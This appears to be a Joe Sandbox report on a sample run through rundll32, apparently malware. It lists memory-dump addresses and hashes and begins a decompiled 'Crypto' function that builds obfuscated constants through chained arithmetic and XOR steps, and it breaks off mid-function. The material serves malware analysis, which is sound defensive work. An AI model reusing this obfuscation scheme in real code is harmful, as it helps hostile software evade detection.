                                                                                                                                  0x002e30ce
                                                                                                                                  0x002e30d9
                                                                                                                                  0x002e30e4
                                                                                                                                  0x002e30ef
                                                                                                                                  0x002e30fa
                                                                                                                                  0x002e3102
                                                                                                                                  0x002e310a
                                                                                                                                  0x002e3115
                                                                                                                                  0x002e3120
                                                                                                                                  0x002e312b
                                                                                                                                  0x002e3136
                                                                                                                                  0x002e3141
                                                                                                                                  0x002e314c
                                                                                                                                  0x002e3157
                                                                                                                                  0x002e3162
                                                                                                                                  0x002e316d
                                                                                                                                  0x002e3178
                                                                                                                                  0x002e3185
                                                                                                                                  0x002e318d
                                                                                                                                  0x002e3198
                                                                                                                                  0x002e31a0
                                                                                                                                  0x002e31a5
                                                                                                                                  0x002e31aa
                                                                                                                                  0x002e31af
                                                                                                                                  0x002e31b7
                                                                                                                                  0x002e31c7
                                                                                                                                  0x002e31cb
                                                                                                                                  0x002e31d0
                                                                                                                                  0x002e31d5
                                                                                                                                  0x002e31dd
                                                                                                                                  0x002e31e8
                                                                                                                                  0x002e31f3
                                                                                                                                  0x002e31fb
                                                                                                                                  0x002e3206
                                                                                                                                  0x002e3211
                                                                                                                                  0x002e321c
                                                                                                                                  0x002e3227
                                                                                                                                  0x002e323c
                                                                                                                                  0x002e323f
                                                                                                                                  0x002e3251
                                                                                                                                  0x002e3258
                                                                                                                                  0x002e3263
                                                                                                                                  0x002e326e
                                                                                                                                  0x002e3276
                                                                                                                                  0x002e3281
                                                                                                                                  0x002e3289
                                                                                                                                  0x002e3291
                                                                                                                                  0x002e3296
                                                                                                                                  0x002e329e
                                                                                                                                  0x002e32a6
                                                                                                                                  0x002e32b1
                                                                                                                                  0x002e32b9
                                                                                                                                  0x002e32c4
                                                                                                                                  0x002e32cf
                                                                                                                                  0x002e32d7
                                                                                                                                  0x002e32df
                                                                                                                                  0x002e32e7
                                                                                                                                  0x002e32eb
                                                                                                                                  0x002e32f3
                                                                                                                                  0x002e3306
                                                                                                                                  0x002e330d
                                                                                                                                  0x002e3318
                                                                                                                                  0x002e3323
                                                                                                                                  0x002e332e
                                                                                                                                  0x002e3339
                                                                                                                                  0x002e3344
                                                                                                                                  0x002e335a
                                                                                                                                  0x002e3369
                                                                                                                                  0x002e336a
                                                                                                                                  0x002e3371
                                                                                                                                  0x002e3379
                                                                                                                                  0x002e3384
                                                                                                                                  0x002e338f
                                                                                                                                  0x002e33a0
                                                                                                                                  0x002e33a7
                                                                                                                                  0x002e33b2
                                                                                                                                  0x002e33bd
                                                                                                                                  0x002e33c8
                                                                                                                                  0x002e33d3
                                                                                                                                  0x002e33db
                                                                                                                                  0x002e33e6
                                                                                                                                  0x002e33fc
                                                                                                                                  0x002e3401
                                                                                                                                  0x002e3412
                                                                                                                                  0x002e3415
                                                                                                                                  0x002e341c
                                                                                                                                  0x002e3427
                                                                                                                                  0x002e3432
                                                                                                                                  0x002e343a
                                                                                                                                  0x002e3445
                                                                                                                                  0x002e3450
                                                                                                                                  0x002e345b
                                                                                                                                  0x002e3466
                                                                                                                                  0x002e3471
                                                                                                                                  0x002e3479
                                                                                                                                  0x002e3484
                                                                                                                                  0x002e348f
                                                                                                                                  0x002e34a2
                                                                                                                                  0x002e34a9
                                                                                                                                  0x002e34b4
                                                                                                                                  0x002e34bf
                                                                                                                                  0x002e34ca
                                                                                                                                  0x002e34d5
                                                                                                                                  0x002e34dd
                                                                                                                                  0x002e34e5
                                                                                                                                  0x002e34ed
                                                                                                                                  0x002e34f8
                                                                                                                                  0x002e3503
                                                                                                                                  0x002e350e
                                                                                                                                  0x002e3519
                                                                                                                                  0x002e352f
                                                                                                                                  0x002e3536
                                                                                                                                  0x002e3541
                                                                                                                                  0x002e354c
                                                                                                                                  0x002e355b
                                                                                                                                  0x002e3560
                                                                                                                                  0x002e3569
                                                                                                                                  0x002e3574
                                                                                                                                  0x002e357f
                                                                                                                                  0x002e3591
                                                                                                                                  0x002e3596
                                                                                                                                  0x002e359f
                                                                                                                                  0x002e35b1
                                                                                                                                  0x002e35b4
                                                                                                                                  0x002e35bb
                                                                                                                                  0x002e35c6
                                                                                                                                  0x002e35d1
                                                                                                                                  0x002e35dc
                                                                                                                                  0x002e35e7
                                                                                                                                  0x002e35ef
                                                                                                                                  0x002e35fa
                                                                                                                                  0x002e3605
                                                                                                                                  0x002e3615
                                                                                                                                  0x002e361c
                                                                                                                                  0x002e3627
                                                                                                                                  0x002e3632
                                                                                                                                  0x002e363d
                                                                                                                                  0x002e3648
                                                                                                                                  0x002e3653
                                                                                                                                  0x002e365d
                                                                                                                                  0x002e3669
                                                                                                                                  0x002e366c
                                                                                                                                  0x002e3673
                                                                                                                                  0x002e3677
                                                                                                                                  0x002e367f
                                                                                                                                  0x002e3687
                                                                                                                                  0x002e368f
                                                                                                                                  0x002e369c
                                                                                                                                  0x002e36a3
                                                                                                                                  0x002e36a7
                                                                                                                                  0x002e36b4
                                                                                                                                  0x002e36b8
                                                                                                                                  0x002e36c0
                                                                                                                                  0x002e36cb
                                                                                                                                  0x002e36d3
                                                                                                                                  0x002e36de
                                                                                                                                  0x002e36e9
                                                                                                                                  0x002e36f1
                                                                                                                                  0x002e36fc
                                                                                                                                  0x002e370f
                                                                                                                                  0x002e3710
                                                                                                                                  0x002e3717
                                                                                                                                  0x002e3722
                                                                                                                                  0x002e372a
                                                                                                                                  0x002e3732
                                                                                                                                  0x002e373a
                                                                                                                                  0x002e3742
                                                                                                                                  0x002e374a
                                                                                                                                  0x002e3752
                                                                                                                                  0x002e3760
                                                                                                                                  0x002e3769
                                                                                                                                  0x002e376d
                                                                                                                                  0x002e376d
                                                                                                                                  0x002e3775
                                                                                                                                  0x002e3775
                                                                                                                                  0x002e3775
                                                                                                                                  0x002e3775
                                                                                                                                  0x002e377b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3781
                                                                                                                                  0x002e3c04
                                                                                                                                  0x002e3c09
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3c09
                                                                                                                                  0x002e3787
                                                                                                                                  0x002e378d
                                                                                                                                  0x002e3a80
                                                                                                                                  0x002e3a86
                                                                                                                                  0x002e3b54
                                                                                                                                  0x002e3b5a
                                                                                                                                  0x002e3bde
                                                                                                                                  0x002e3be3
                                                                                                                                  0x002e3be5
                                                                                                                                  0x002e3bf6
                                                                                                                                  0x002e3bf6
                                                                                                                                  0x002e3a28
                                                                                                                                  0x002e3a28
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3a28
                                                                                                                                  0x002e3b5c
                                                                                                                                  0x002e3b62
                                                                                                                                  0x002e3baf
                                                                                                                                  0x002e3bbb
                                                                                                                                  0x002e3bc4
                                                                                                                                  0x002e3bcc
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3bcc
                                                                                                                                  0x002e3b64
                                                                                                                                  0x002e3b6a
                                                                                                                                  0x002e3ba1
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3ba1
                                                                                                                                  0x002e3b6c
                                                                                                                                  0x002e3b6e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3b90
                                                                                                                                  0x002e3b97
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3b97
                                                                                                                                  0x002e3a8c
                                                                                                                                  0x002e3b3d
                                                                                                                                  0x002e3b42
                                                                                                                                  0x002e3b44
                                                                                                                                  0x002e4009
                                                                                                                                  0x002e4010
                                                                                                                                  0x002e4010
                                                                                                                                  0x002e3b4a
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3b4a
                                                                                                                                  0x002e3a92
                                                                                                                                  0x002e3a98
                                                                                                                                  0x002e3b0f
                                                                                                                                  0x002e3b21
                                                                                                                                  0x002e3b27
                                                                                                                                  0x002e3b28
                                                                                                                                  0x002e3b2f
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3b2f
                                                                                                                                  0x002e3a9a
                                                                                                                                  0x002e3aa0
                                                                                                                                  0x002e3ae5
                                                                                                                                  0x002e3aec
                                                                                                                                  0x002e3af1
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3af1
                                                                                                                                  0x002e3aa2
                                                                                                                                  0x002e3aa8
                                                                                                                                  0x002e3ad6
                                                                                                                                  0x002e3adb
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3adb
                                                                                                                                  0x002e3aaa
                                                                                                                                  0x002e3ab0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3ab6
                                                                                                                                  0x002e3abd
                                                                                                                                  0x002e3abf
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3abf
                                                                                                                                  0x002e3793
                                                                                                                                  0x002e3a70
                                                                                                                                  0x002e3a75
                                                                                                                                  0x002e3a76
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3a76
                                                                                                                                  0x002e3799
                                                                                                                                  0x002e379f
                                                                                                                                  0x002e38e1
                                                                                                                                  0x002e38e7
                                                                                                                                  0x002e39f9
                                                                                                                                  0x002e3a00
                                                                                                                                  0x002e3a02
                                                                                                                                  0x002e3a32
                                                                                                                                  0x002e3a39
                                                                                                                                  0x002e3a3c
                                                                                                                                  0x002e3a48
                                                                                                                                  0x002e3a4a
                                                                                                                                  0x002e3a51
                                                                                                                                  0x002e3a51
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3a51
                                                                                                                                  0x002e3a4c
                                                                                                                                  0x002e3a4f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3a4f
                                                                                                                                  0x002e3a3e
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3a3e
                                                                                                                                  0x002e3a1d
                                                                                                                                  0x002e3a23
                                                                                                                                  0x002e3a24
                                                                                                                                  0x002e3a26
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3a26
                                                                                                                                  0x002e38ed
                                                                                                                                  0x002e38f3
                                                                                                                                  0x002e3fd7
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3fdc
                                                                                                                                  0x002e38f9
                                                                                                                                  0x002e38ff
                                                                                                                                  0x002e3959
                                                                                                                                  0x002e3965
                                                                                                                                  0x002e398e
                                                                                                                                  0x002e3995
                                                                                                                                  0x002e399a
                                                                                                                                  0x002e39b7
                                                                                                                                  0x002e39bd
                                                                                                                                  0x002e39d5
                                                                                                                                  0x00000000
                                                                                                                                  0x002e39da
                                                                                                                                  0x002e3901
                                                                                                                                  0x002e3907
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3914
                                                                                                                                  0x002e3919
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3919
                                                                                                                                  0x002e37a5
                                                                                                                                  0x002e3895
                                                                                                                                  0x002e389a
                                                                                                                                  0x002e389c
                                                                                                                                  0x002e38c5
                                                                                                                                  0x002e38ce
                                                                                                                                  0x002e38d6
                                                                                                                                  0x002e389e
                                                                                                                                  0x002e38a2
                                                                                                                                  0x002e38ab
                                                                                                                                  0x002e38b3
                                                                                                                                  0x002e38b3
                                                                                                                                  0x00000000
                                                                                                                                  0x002e389c
                                                                                                                                  0x002e37b1
                                                                                                                                  0x002e3881
                                                                                                                                  0x002e3887
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3887
                                                                                                                                  0x002e37bd
                                                                                                                                  0x002e3850
                                                                                                                                  0x002e3855
                                                                                                                                  0x002e385c
                                                                                                                                  0x002e3864
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3864
                                                                                                                                  0x002e37c5
                                                                                                                                  0x002e37f6
                                                                                                                                  0x002e37fb
                                                                                                                                  0x002e3802
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3802
                                                                                                                                  0x002e37cd
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e37de
                                                                                                                                  0x002e37e5
                                                                                                                                  0x00000000
                                                                                                                                  0x002e37eb
                                                                                                                                  0x002e37eb
                                                                                                                                  0x00000000
                                                                                                                                  0x002e37eb
                                                                                                                                  0x002e37e5
                                                                                                                                  0x002e3c13
                                                                                                                                  0x002e3c19
                                                                                                                                  0x002e3e40
                                                                                                                                  0x002e3e46
                                                                                                                                  0x002e3edd
                                                                                                                                  0x002e3ee3
                                                                                                                                  0x002e3f9b
                                                                                                                                  0x002e3fa0
                                                                                                                                  0x002e3fa2
                                                                                                                                  0x002e3e13
                                                                                                                                  0x002e3e13
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3e13
                                                                                                                                  0x002e3fa8
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3fa8
                                                                                                                                  0x002e3ee9
                                                                                                                                  0x002e3eef
                                                                                                                                  0x002e3f21
                                                                                                                                  0x002e3f28
                                                                                                                                  0x002e3f89
                                                                                                                                  0x002e3f89
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3f89
                                                                                                                                  0x002e3f38
                                                                                                                                  0x002e3f54
                                                                                                                                  0x002e3f5b
                                                                                                                                  0x002e3f60
                                                                                                                                  0x002e3f63
                                                                                                                                  0x002e3f6a
                                                                                                                                  0x002e3f84
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3f84
                                                                                                                                  0x002e3f6c
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3f6c
                                                                                                                                  0x002e3ef1
                                                                                                                                  0x002e3ef7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3f0b
                                                                                                                                  0x002e3f10
                                                                                                                                  0x002e3f17
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3f17
                                                                                                                                  0x002e3e4c
                                                                                                                                  0x002e3ec6
                                                                                                                                  0x002e3ecb
                                                                                                                                  0x002e3ecd
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3ed3
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3ed3
                                                                                                                                  0x002e3e4e
                                                                                                                                  0x002e3e54
                                                                                                                                  0x002e3ea9
                                                                                                                                  0x002e3eae
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3eae
                                                                                                                                  0x002e3e56
                                                                                                                                  0x002e3e5c
                                                                                                                                  0x002e4004
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4004
                                                                                                                                  0x002e3e62
                                                                                                                                  0x002e3e68
                                                                                                                                  0x002e3e93
                                                                                                                                  0x002e3e98
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3e98
                                                                                                                                  0x002e3e6a
                                                                                                                                  0x002e3e70
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3e7d
                                                                                                                                  0x002e3e82
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3e82
                                                                                                                                  0x002e3c1f
                                                                                                                                  0x002e3e24
                                                                                                                                  0x002e3e2d
                                                                                                                                  0x002e3e35
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3e35
                                                                                                                                  0x002e3c25
                                                                                                                                  0x002e3c2b
                                                                                                                                  0x002e3d2d
                                                                                                                                  0x002e3d33
                                                                                                                                  0x002e3e0e
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3e0e
                                                                                                                                  0x002e3d39
                                                                                                                                  0x002e3d3f
                                                                                                                                  0x002e3fef
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3fef
                                                                                                                                  0x002e3d45
                                                                                                                                  0x002e3d4b
                                                                                                                                  0x002e3d8c
                                                                                                                                  0x002e3d91
                                                                                                                                  0x002e3d92
                                                                                                                                  0x002e3d94
                                                                                                                                  0x002e3d9c
                                                                                                                                  0x002e3da3
                                                                                                                                  0x002e3da5
                                                                                                                                  0x002e3dc3
                                                                                                                                  0x002e3dc5
                                                                                                                                  0x002e3dcc
                                                                                                                                  0x002e3dcc
                                                                                                                                  0x002e3dcd
                                                                                                                                  0x002e3dd0
                                                                                                                                  0x002e3deb
                                                                                                                                  0x002e3df1
                                                                                                                                  0x002e3df2
                                                                                                                                  0x002e3df2
                                                                                                                                  0x002e3d96
                                                                                                                                  0x002e3d96
                                                                                                                                  0x002e3d96
                                                                                                                                  0x002e3df4
                                                                                                                                  0x002e3df6
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3df6
                                                                                                                                  0x002e3d4d
                                                                                                                                  0x002e3d53
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3d60
                                                                                                                                  0x002e3d65
                                                                                                                                  0x002e3d6c
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3d6c
                                                                                                                                  0x002e3c31
                                                                                                                                  0x002e3d16
                                                                                                                                  0x002e3d1b
                                                                                                                                  0x002e3d1d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3d23
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3d23
                                                                                                                                  0x002e3c37
                                                                                                                                  0x002e3c3d
                                                                                                                                  0x002e3ce0
                                                                                                                                  0x002e3cef
                                                                                                                                  0x002e3cf4
                                                                                                                                  0x002e3cfb
                                                                                                                                  0x002e3d03
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3d03
                                                                                                                                  0x002e3c43
                                                                                                                                  0x002e3c49
                                                                                                                                  0x002e3c9e
                                                                                                                                  0x002e3caa
                                                                                                                                  0x002e3cbe
                                                                                                                                  0x002e3cc4
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3cc4
                                                                                                                                  0x002e3c4b
                                                                                                                                  0x002e3c51
                                                                                                                                  0x002e3c81
                                                                                                                                  0x002e3c86
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3c86
                                                                                                                                  0x002e3c53
                                                                                                                                  0x002e3c59
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3c63
                                                                                                                                  0x002e3c68
                                                                                                                                  0x002e3c6a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3c70
                                                                                                                                  0x00000000
                                                                                                                                  0x002e3fad
                                                                                                                                  0x002e3fad
                                                                                                                                  0x002e3fad
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: )If$D}$D}$G$TRr$Y2($\Q$c{v$n)+$orh$rZM*${)t${)t$`$u#$xy
                                                                                                                                  • API String ID: 0-2742041174
                                                                                                                                  • Opcode ID: 5d16f609cefc46e316977bf103c4d6c139bf6f95c8e25fa96db40445ee930701
                                                                                                                                  • Instruction ID: c0d3a07f2e6a03f44f62d3bd02e449b4eb5074c88abf86a87a1b1c4cb0a9a220
                                                                                                                                  • Opcode Fuzzy Hash: 5d16f609cefc46e316977bf103c4d6c139bf6f95c8e25fa96db40445ee930701
                                                                                                                                  • Instruction Fuzzy Hash: 56C222715583818BD378CF25C58ABCBBBE1BB84314F50892EE5DA97260DBB08958CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D2BD9 Relevance: 19.4, Strings: 15, Instructions: 636COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                  			E002D2BD9(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char* _v60;
				intOrPtr _v64;
				signed int _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				char _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				void* _t716;
				void* _t717;
				void* _t718;
				intOrPtr _t730;
				intOrPtr _t732;
				void* _t733;
				signed int _t735;
				void* _t741;
				intOrPtr _t746;
				intOrPtr _t752;
				intOrPtr _t754;
				intOrPtr _t755;
				void* _t757;
				void* _t759;
				intOrPtr _t760;
				void* _t766;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				void* _t783;
				intOrPtr _t792;
				void* _t807;
				void* _t812;
				void* _t842;
				intOrPtr _t848;
				void* _t864;
				intOrPtr _t866;
				signed int _t867;
				void* _t868;
				void* _t873;
				signed int* _t875;
				void* _t878;

				_t875 =  &_v396;
				_v56 = 0xa0cd19;
				_t873 = 0;
				_v84 = __ecx;
				_v52 = _v52 & 0;
				_t766 = 0x41de8e2;
				_v48 = _v48 & 0;
				_v300 = 0x1109eb;
				_v300 = _v300 + 0xcb;
				_v300 = _v300 | 0xecff95c2;
				_v300 = _v300 ^ 0xa1bddbbd;
				_v252 = 0xe28eec;
				_v252 = _v252 + 0x19d6;
				_v252 = _v252 | 0xcaf404bd;
				_v252 = _v252 ^ 0xcaf6acfe;
				_v124 = 0x517500;
				_v124 = _v124 + 0x84ec;
				_v124 = _v124 ^ 0x0051f9ec;
				_v344 = 0xbde49;
				_t772 = 0x31;
				_v344 = _v344 * 0x35;
				_v344 = _v344 << 9;
				_v344 = _v344 + 0x7afe;
				_v344 = _v344 ^ 0xea0ab4fe;
				_v232 = 0xd06c4e;
				_v232 = _v232 | 0x98bd8447;
				_v232 = _v232 + 0xffff492f;
				_v232 = _v232 ^ 0x98fd357e;
				_v236 = 0xf2a19d;
				_v236 = _v236 << 8;
				_v236 = _v236 | 0xeb063d66;
				_v236 = _v236 ^ 0xfba7bd66;
				_v304 = 0x7cba75;
				_v304 = _v304 << 0x10;
				_v304 = _v304 >> 0xd;
				_v304 = _v304 ^ 0x0005d3a8;
				_v220 = 0xced2db;
				_v220 = _v220 >> 0xb;
				_v220 = _v220 * 0x6a;
				_v220 = _v220 ^ 0x000ab444;
				_v356 = 0x98a5e4;
				_v356 = _v356 ^ 0xdd9204f6;
				_v356 = _v356 | 0x4689a95f;
				_v356 = _v356 * 0x48;
				_v356 = _v356 ^ 0xdf47a2b8;
				_v292 = 0x99ac6b;
				_v292 = _v292 * 0x35;
				_v292 = _v292 / _t772;
				_v292 = _v292 ^ 0x00a637e1;
				_v348 = 0x8d86f8;
				_v348 = _v348 + 0x9ec9;
				_v348 = _v348 + 0xfffff441;
				_v348 = _v348 * 0x3a;
				_v348 = _v348 ^ 0x2031e474;
				_v208 = 0x39dd97;
				_v208 = _v208 << 0x10;
				_v208 = _v208 + 0x9a19;
				_v208 = _v208 ^ 0xdd979a19;
				_v100 = 0xd2197;
				_v100 = _v100 + 0x97e4;
				_v100 = _v100 ^ 0x000db95b;
				_v324 = 0x771ce;
				_v324 = _v324 << 1;
				_v324 = _v324 ^ 0x580a954c;
				_v324 = _v324 ^ 0x580cba62;
				_v352 = 0xd79a55;
				_t867 = 0x4d;
				_v352 = _v352 / _t867;
				_v352 = _v352 << 5;
				_v352 = _v352 + 0xffffa0ed;
				_v352 = _v352 ^ 0x005b1fb1;
				_v264 = 0xbc6795;
				_v264 = _v264 + 0x99f5;
				_v264 = _v264 | 0xde86e00c;
				_v264 = _v264 ^ 0xdeb9ffad;
				_v240 = 0x2649df;
				_v240 = _v240 + 0x8f57;
				_v240 = _v240 + 0xffffdcf3;
				_v240 = _v240 ^ 0x002859eb;
				_v180 = 0x284ff;
				_v180 = _v180 + 0xfffffbe4;
				_v180 = _v180 ^ 0x0004b053;
				_v248 = 0x43d81c;
				_t773 = 0x2c;
				_v248 = _v248 * 0x30;
				_v248 = _v248 + 0x77f1;
				_v248 = _v248 ^ 0x0cb65cea;
				_v164 = 0x561af9;
				_v164 = _v164 * 0x5f;
				_v164 = _v164 ^ 0x1ff767f2;
				_v172 = 0x424117;
				_v172 = _v172 / _t773;
				_v172 = _v172 ^ 0x000edcdb;
				_v336 = 0xedf003;
				_v336 = _v336 + 0xffff11da;
				_v336 = _v336 >> 2;
				_v336 = _v336 >> 9;
				_v336 = _v336 ^ 0x000c05d4;
				_v216 = 0xec53cc;
				_v216 = _v216 | 0x30e2710b;
				_v216 = _v216 * 0x1f;
				_v216 = _v216 ^ 0xeced0588;
				_v224 = 0xc36dcc;
				_v224 = _v224 * 0x64;
				_v224 = _v224 * 0xc;
				_v224 = _v224 ^ 0x9413d5fd;
				_v148 = 0x5fde01;
				_v148 = _v148 ^ 0x51967584;
				_v148 = _v148 ^ 0x51c7dbee;
				_v156 = 0x26546c;
				_v156 = _v156 ^ 0x8ec08bcd;
				_v156 = _v156 ^ 0x8eeee361;
				_v396 = 0x210674;
				_v396 = _v396 ^ 0xb585172f;
				_v396 = _v396 >> 9;
				_v396 = _v396 ^ 0x5fa8c9ed;
				_v396 = _v396 ^ 0x5ff25ba7;
				_v112 = 0xa4fdb5;
				_v112 = _v112 ^ 0x7ac22777;
				_v112 = _v112 ^ 0x7a606cfd;
				_v160 = 0x7fe066;
				_v160 = _v160 | 0xe6d7910f;
				_v160 = _v160 ^ 0xe6fe40a3;
				_v152 = 0xb045a1;
				_v152 = _v152 ^ 0x0733bf74;
				_v152 = _v152 ^ 0x078d93a6;
				_v384 = 0x7bd524;
				_v384 = _v384 + 0xffff236c;
				_v384 = _v384 * 0x7b;
				_v384 = _v384 + 0xffffb98b;
				_v384 = _v384 ^ 0x3b1735e1;
				_v392 = 0x61d9a1;
				_v392 = _v392 + 0xab93;
				_v392 = _v392 + 0xffff054c;
				_v392 = _v392 | 0xc62dc39c;
				_v392 = _v392 ^ 0xc661791a;
				_v376 = 0x1528d1;
				_v376 = _v376 << 8;
				_v376 = _v376 + 0xffff31a1;
				_v376 = _v376 >> 9;
				_v376 = _v376 ^ 0x000f3b72;
				_v268 = 0x199e3d;
				_v268 = _v268 ^ 0x3c18ecc0;
				_v268 = _v268 >> 0xf;
				_v268 = _v268 ^ 0x00085298;
				_v116 = 0x9d324d;
				_t774 = 0x5b;
				_v116 = _v116 * 0x35;
				_v116 = _v116 ^ 0x2088a224;
				_v144 = 0xea008e;
				_v144 = _v144 * 0x31;
				_v144 = _v144 ^ 0x2cc3d943;
				_v200 = 0xbe23d7;
				_v200 = _v200 / _t774;
				_v200 = _v200 ^ 0x0006a720;
				_v368 = 0xbc3a01;
				_v368 = _v368 >> 2;
				_v368 = _v368 << 1;
				_v368 = _v368 | 0x91e27348;
				_v368 = _v368 ^ 0x91f48308;
				_v312 = 0x81ba05;
				_v312 = _v312 ^ 0x6d6d273d;
				_v312 = _v312 + 0x9af1;
				_v312 = _v312 ^ 0x6ded9aad;
				_v320 = 0xa9a2ca;
				_v320 = _v320 / _t867;
				_t775 = 0x39;
				_v320 = _v320 / _t775;
				_v320 = _v320 ^ 0x0005ef3e;
				_v136 = 0x8e55db;
				_t776 = 0xb;
				_v136 = _v136 / _t776;
				_v136 = _v136 ^ 0x00010f6d;
				_v296 = 0x9a02a3;
				_v296 = _v296 | 0xc0bbeea6;
				_v296 = _v296 ^ 0xfebfff47;
				_v296 = _v296 ^ 0x3e0de8e7;
				_v196 = 0x628794;
				_v196 = _v196 >> 7;
				_v196 = _v196 ^ 0x00033c53;
				_v360 = 0xc75687;
				_t777 = 0x55;
				_v360 = _v360 / _t777;
				_t778 = 0x4a;
				_v360 = _v360 / _t778;
				_t779 = 0x66;
				_v360 = _v360 / _t779;
				_v360 = _v360 ^ 0x0006bc1c;
				_v288 = 0xb89ddb;
				_t780 = 0x5c;
				_v288 = _v288 * 0x7b;
				_v288 = _v288 + 0x220a;
				_v288 = _v288 ^ 0x58b2320e;
				_v108 = 0x352a49;
				_v108 = _v108 | 0x42677ea4;
				_v108 = _v108 ^ 0x427d3f06;
				_v332 = 0x1123f9;
				_v332 = _v332 + 0xfffffbdd;
				_v332 = _v332 + 0xffff8b7f;
				_v332 = _v332 | 0xcf6269e1;
				_v332 = _v332 ^ 0xcf7a63e7;
				_v192 = 0x15ba5c;
				_v192 = _v192 + 0xffff7d63;
				_v192 = _v192 ^ 0x0011de47;
				_v204 = 0xd88287;
				_v204 = _v204 >> 1;
				_v204 = _v204 ^ 0x006fcfd9;
				_v308 = 0x394063;
